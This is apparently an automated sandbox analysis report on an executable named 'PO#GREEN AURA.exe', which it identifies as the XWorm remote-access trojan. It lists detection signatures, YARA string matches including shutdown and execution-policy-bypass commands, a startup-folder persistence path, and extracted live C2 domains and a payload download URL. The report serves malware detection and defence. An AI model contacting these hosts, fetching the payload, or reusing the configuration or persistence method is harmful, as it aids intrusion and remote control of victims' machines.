Edit tour

Windows Analysis Report
PO#GREEN AURA.exe

Overview

General Information

Sample name:	PO#GREEN AURA.exe
Analysis ID:	1630686
MD5:	71e0c8f71b15046709d4e250086346a4
SHA1:	9536f9bc5e10128074cdd2597e970b29d44c4bcd
SHA256:	462e4f6c2647a8fffb7be6a37eca3dfef4051f9f20a5e8927b446d98d1af84f0
Tags:	exeuser-threatcat_ch
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected AntiVM3

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

C2 URLs / IPs found in malware configuration

Drops VBS files to the startup folder

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Sample uses string decryption to hide its real strings

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

PO#GREEN AURA.exe (PID: 2136 cmdline: "C:\Users\user\Desktop\PO#GREEN AURA.exe" MD5: 71E0C8F71B15046709D4E250086346A4)

PO#GREEN AURA.exe (PID: 6840 cmdline: "C:\Users\user\Desktop\PO#GREEN AURA.exe" MD5: 71E0C8F71B15046709D4E250086346A4)

WerFault.exe (PID: 4484 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://cyber.wtf/2025/02/12/unpacking-pyarmor-v8-scripts/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu", "bin12.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6c77:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6d14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6e29:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ae9:$cnc4: POST / HTTP/1.1
00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x220c3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x22160:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x22275:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x21f35:$cnc4: POST / HTTP/1.1
00000000.00000002.1842730771.0000000006580000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xfea00:$s8: Win32_ComputerSystem 0x118123:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1181c0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1182d5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x117f95:$cnc4: POST / HTTP/1.1
Process Memory Space: PO#GREEN AURA.exe PID: 2136	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: PO#GREEN AURA.exe PID: 2136	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: PO#GREEN AURA.exe PID: 2136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO#GREEN AURA.exe PID: 6840	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.PO#GREEN AURA.exe.6580000.9.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.PO#GREEN AURA.exe.6580000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
1.2.PO#GREEN AURA.exe.400000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.2.PO#GREEN AURA.exe.400000.0.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6723:$str05: Select * from AntivirusProduct 0x6921:$str06: PCRestart 0x6935:$str07: shutdown.exe /f /r /t 0 0x69e7:$str08: StopReport 0x69bd:$str09: StopDDos 0x6abf:$str10: sendPlugin 0x6b3f:$str11: OfflineKeylogger Not Enabled 0x6ca5:$str12: -ExecutionPolicy Bypass -File " 0x6dce:$str13: Content-length: 5235
1.2.PO#GREEN AURA.exe.400000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e77:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7029:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ce9:$cnc4: POST / HTTP/1.1
0.2.PO#GREEN AURA.exe.346f2ac.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PO#GREEN AURA.exe.346f2ac.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x3be5:$str01: $VB$Local_Port 0x3bd6:$str02: $VB$Local_Host 0x3ee6:$str03: get_Jpeg 0x388e:$str04: get_ServicePack 0x4923:$str05: Select * from AntivirusProduct 0x4b21:$str06: PCRestart 0x4b35:$str07: shutdown.exe /f /r /t 0 0x4be7:$str08: StopReport 0x4bbd:$str09: StopDDos 0x4cbf:$str10: sendPlugin 0x4d3f:$str11: OfflineKeylogger Not Enabled 0x4ea5:$str12: -ExecutionPolicy Bypass -File " 0x4fce:$str13: Content-length: 5235
0.2.PO#GREEN AURA.exe.346f2ac.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x5077:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5114:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5229:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x4ee9:$cnc4: POST / HTTP/1.1
0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x59e5:$str01: $VB$Local_Port 0x59d6:$str02: $VB$Local_Host 0x5ce6:$str03: get_Jpeg 0x568e:$str04: get_ServicePack 0x6723:$str05: Select * from AntivirusProduct 0x6921:$str06: PCRestart 0x6935:$str07: shutdown.exe /f /r /t 0 0x69e7:$str08: StopReport 0x69bd:$str09: StopDDos 0x6abf:$str10: sendPlugin 0x6b3f:$str11: OfflineKeylogger Not Enabled 0x6ca5:$str12: -ExecutionPolicy Bypass -File " 0x6dce:$str13: Content-length: 5235
0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6e77:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6f14:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7029:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6ce9:$cnc4: POST / HTTP/1.1
Click to see the 6 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\PO#GREEN AURA.exe, ProcessId: 2136, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["kingsbkup1.ydns.eu", "smfcs1.ydns.eu", "smfcs3.ydns.eu", "bin12.ydns.eu"], "Port": 4050, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: PO#GREEN AURA.exe

ReversingLabs: Detection: 31%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: kingsbkup1.ydns.eu,smfcs1.ydns.eu,smfcs3.ydns.eu,bin12.ydns.eu
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: 4050
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: CHINA DOGGY
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp	String decryptor: USB.exe

Source: PO#GREEN AURA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: PO#GREEN AURA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\System.pdbF source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\PO#GREEN AURA.PDBs source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\user\Desktop\PO#GREEN AURA.PDB source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: n,C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdbh source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B8C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000B22000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: PO#GREEN AURA.exe, 00000001.00000002.2937883086.00000000008F8000.00000004.00000010.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EE5E2Fh	0_2_06EE5AA0
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EE63E2h	0_2_06EE61E9
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EE63E2h	0_2_06EE61F8
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EEBEBBh	0_2_06EEBF77
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EEBEBBh	0_2_06EEBD28
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EEBEBBh	0_2_06EEBD38
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EE5E2Fh	0_2_06EE5A90
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06EE5E2Fh	0_2_06EE5B83
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06F8C130h	0_2_06F8C078
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 4x nop then jmp 06F8C130h	0_2_06F8C070

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: kingsbkup1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs1.ydns.eu
Source: Malware configuration extractor	URLs: smfcs3.ydns.eu
Source: Malware configuration extractor	URLs: bin12.ydns.eu

Source: global traffic

HTTP traffic detected: GET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 45.144.214.104 45.144.214.104

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /1/12/panel/uploads/Xlzsats.wav HTTP/1.1Host: win32.ydns.euConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: win32.ydns.eu

Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003321000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://win32.ydns.eu/1/12/panel/uploads/Xlzsats.wav
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO#GREEN AURA.exe

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8D8F0 NtProtectVirtualMemory,		0_2_06F8D8F0
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8D8E9 NtProtectVirtualMemory,		0_2_06F8D8E9

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_01954361	0_2_01954361
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_0195F950	0_2_0195F950
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE22F0	0_2_06EE22F0
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE7870	0_2_06EE7870
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EEB540	0_2_06EEB540
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EEB550	0_2_06EEB550
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE5A90	0_2_06EE5A90
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE9818	0_2_06EE9818
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06EE9814	0_2_06EE9814
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8A4B0	0_2_06F8A4B0
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F837D8	0_2_06F837D8
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8A4A2	0_2_06F8A4A2
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_06F8CA39	0_2_06F8CA39
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_0702FB90	0_2_0702FB90
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_0702E578	0_2_0702E578
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_07010007	0_2_07010007
Source: C:\Users\user\Desktop\PO#GREEN AURA.exe	Code function: 0_2_07010040	0_2_07010040

Source: C:\Users\user\Desktop\PO#GREEN AURA.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6840 -s 928

Source: PO#GREEN AURA.exe, 00000000.00000002.1843608401.0000000006E90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1841397492.0000000006220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameHlzbztbfez.dll" vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1843788679.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.0000000003628000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000000.00000002.1828695571.000000000158E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000001.00000002.2938272270.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO#GREEN AURA.exe
Source: PO#GREEN AURA.exe, 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCHINA DOGGY X-WORM.exe4 vs PO#GREEN AURA.exe

Source: PO#GREEN AURA.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 1.2.PO#GREEN AURA.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000001.00000002.2937624214.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1829754356.0000000003578000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.1829754356.000000000335E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: PO#GREEN AURA.exe, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: PO#GREEN AURA.exe, Yvietm.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Count.exe.0.dr, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Count.exe.0.dr, Yvietm.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, -.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.PO#GREEN AURA.exe.43314f0.5.raw.unpack, Yvietm.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.PO#GREEN AURA.exe.6ef0000.11.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.PO#GREEN AURA.exe.346f2ac.1.raw.unpack, Settings.cs

Base64 encoded string: 'plINeG3H7q6O5CjvVNe1BgYQfW6RVXr1RwNCSV7PFnikFkafKb9cYtfLlAed5U24c6kFCYSxvxbpE2UgKzZGGQ=='

